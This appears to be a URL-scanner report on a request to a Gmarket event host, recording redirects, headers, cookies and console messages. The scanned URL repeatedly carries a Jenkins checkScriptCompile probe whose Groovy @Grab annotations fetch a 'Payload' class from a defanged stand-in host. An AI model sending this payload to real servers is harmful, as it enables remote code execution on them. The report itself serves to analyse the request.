https://uts.gmarket.co.kr/ub/add/1/view/page/1.0?url=https%3A%3BSL%3BSLevent.gmarket.co.kr%3BSLsecurityRealm%3BSLuser%3BSLadmin%3BSLdescriptorByName%3BSLorg.jenkinsci.plugins.workflow.cps.CpsFlowDefinition%3BSLcheckScriptCompile%3BQUvalue%3D%40GrabConfig(disableChecksums%3Dtrue)%2520%40GrabResolver(name%3D%2527test%2527%2C%2520root%3D%2527hxxp%3A%3BSL%3BSLaaa%2527)%2520%40Grab(group%3D%2527package%2527%2C%2520module%3D%2527vulntest%2527%2C%2520version%3D%25271%2527)%2520import%2520Payload&ref=&lang=en-US&hlen=2&sw=1600&sh=1200&__proto__=
Requested by
Host: event.gmarket.co.kr
URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Protocol
HTTP/1.1
Server
183.111.134.45 , Korea, Republic Of, ASN4766 (KIXS-AS-KR Korea Telecom, KR),
Reverse DNS
Software
/
Resource Hash
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

accept-language
en-CA,en;q=0.9
Referer
https://event.gmarket.co.kr/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36

Response headers

date
Fri, 12 Jan 2024 05:27:33 GMT
cache-control
private

Redirect headers

location
http://uts.gmarket.co.kr/ub/add/1/view/page/1.0?url=https%3A%3BSL%3BSLevent.gmarket.co.kr%3BSLsecurityRealm%3BSLuser%3BSLadmin%3BSLdescriptorByName%3BSLorg.jenkinsci.plugins.workflow.cps.CpsFlowDefinition%3BSLcheckScriptCompile%3BQUvalue%3D%40GrabConfig(disableChecksums%3Dtrue)%2520%40GrabResolver(name%3D%2527test%2527%2C%2520root%3D%2527hxxp%3A%3BSL%3BSLaaa%2527)%2520%40Grab(group%3D%2527package%2527%2C%2520module%3D%2527vulntest%2527%2C%2520version%3D%25271%2527)%2520import%2520Payload&ref=&lang=en-US&hlen=2&sw=1600&sh=1200&__proto__=
date
Fri, 12 Jan 2024 05:27:32 GMT
content-length
650
vary
Accept
content-type
text/plain; charset=UTF-8
Logging
impssllog.gmarket.co.kr/wlo/ 		0
0

Failed requests

These URLs were requested, but there was no response received. You will also see them in the list above.

Domain
script.gmarket.co.kr
URL
http://script.gmarket.co.kr/jQuery/1.6.4/jquery-1.6.4.min.js
Domain
script.gmarket.co.kr
URL
http://script.gmarket.co.kr/js/header/Header.js
Domain
script.gmarket.co.kr
URL
http://script.gmarket.co.kr/js/header/Footer.js
Domain
impssllog.gmarket.co.kr
URL
https://impssllog.gmarket.co.kr:8040/wlo/Logging?dv=968407505|ver=1.0.0|sid=ssllog|r=https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%2520@GrabResolver(name=%2527test%2527,%2520root=%2527hxxp://aaa%2527)%2520@Grab(group=%2527package%2527,%2520module=%2527vulntest%2527,%2520version=%25271%2527)%2520import%2520Payload|rf=|c=n_ss=1600x1200;%20n_cs=en-us;%20|a=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/120.0.6099.216%20Safari/537.36

Verdicts & Comments Add Verdict or Comment

0 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

13 Cookies

Domain/Path Name / Value
.gmarket.co.kr/ Name: BASKET%5FCALLBACK%5FSTAT
Value: F
.gmarket.co.kr/ Name: Sif
Value: 3e001375ac4fce3f7663946aeee30575
.gmarket.co.kr/ Name: gmktloadingtimecheck
Value: N
.gmarket.co.kr/ Name: user%5Finfo
Value: isNego=N
.gmarket.co.kr/ Name: Pif
Value: 67D4D3B7BEF59864807172B53640156647B0A541183186FB95E8A32298F0FF85202A2F5636A030231088962AA66E835C
event.gmarket.co.kr/ Name: ASPSESSIONIDSQRCDSBA
Value: OBBCONEANIEDACNFEEPNPNLA
.gmarket.co.kr/ Name: PCUID
Value: 17050372521132435825412
.gmarket.co.kr/ Name: cguid
Value: 11705037252281004052000000
.gmarket.co.kr/ Name: pguid
Value: 21705037252281004052010000
.gmarket.co.kr/ Name: sguid
Value: 31705037252281004052200000
.gmarket.co.kr/ Name: ssguid
Value: 317050372522810040522000000
pdsssl.gmarket.co.kr/ Name: 675bf2adde08731c9443049ad520f916
Value: f40e5aa41e4103f0d34b3d4fb5723cfc
uts.gmarket.co.kr/ Name: 6b2ae17cfd6aceab9a9b318d4ae1ae3c
Value: 5ec222a4e205917e552c65db5695ade3

7 Console Messages

Source Level URL
Text
security warning URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Message:
Mixed Content: The page at 'https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload' was loaded over HTTPS, but requested an insecure element 'http://image.gmarket.co.kr/challenge/gongji/err_page_not_exist.gif'. This request was automatically upgraded to HTTPS, For more information see https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.html
security error URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Message:
Mixed Content: The page at 'https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload' was loaded over HTTPS, but requested an insecure script 'http://script.gmarket.co.kr/jQuery/1.6.4/jquery-1.6.4.min.js'. This request has been blocked; the content must be served over HTTPS.
security error URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Message:
Mixed Content: The page at 'https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload' was loaded over HTTPS, but requested an insecure script 'http://script.gmarket.co.kr/js/header/Header.js'. This request has been blocked; the content must be served over HTTPS.
security warning URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload(Line 41)
Message:
Mixed Content: The page at 'https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload' was loaded over HTTPS, but requested an insecure element 'http://image.gmarket.co.kr/challenge/gongji/err_page_not_exist.gif'. This request was automatically upgraded to HTTPS, For more information see https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.html
security error URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload
Message:
Mixed Content: The page at 'https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload' was loaded over HTTPS, but requested an insecure script 'http://script.gmarket.co.kr/js/header/Footer.js'. This request has been blocked; the content must be served over HTTPS.
security warning URL: https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload(Line 49)
Message:
Mixed Content: The page at 'https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%20@GrabResolver(name=%27test%27,%20root=%27hxxp://aaa%27)%20@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%20import%20Payload' was loaded over a secure connection, but contains a form that targets an insecure endpoint 'http://www.kiec.or.kr/jsp/open/eTrust_info.jsp'. This endpoint should be made available over a secure connection.
network error URL: https://impssllog.gmarket.co.kr:8040/wlo/Logging?dv=968407505|ver=1.0.0|sid=ssllog|r=https://event.gmarket.co.kr/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%2520@GrabResolver(name=%2527test%2527,%2520root=%2527hxxp://aaa%2527)%2520@Grab(group=%2527package%2527,%2520module=%2527vulntest%2527,%2520version=%25271%2527)%2520import%2520Payload|rf=|c=n_ss=1600x1200;%20n_cs=en-us;%20|a=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/120.0.6099.216%20Safari/537.36
Message:
Failed to load resource: net::ERR_NAME_NOT_RESOLVED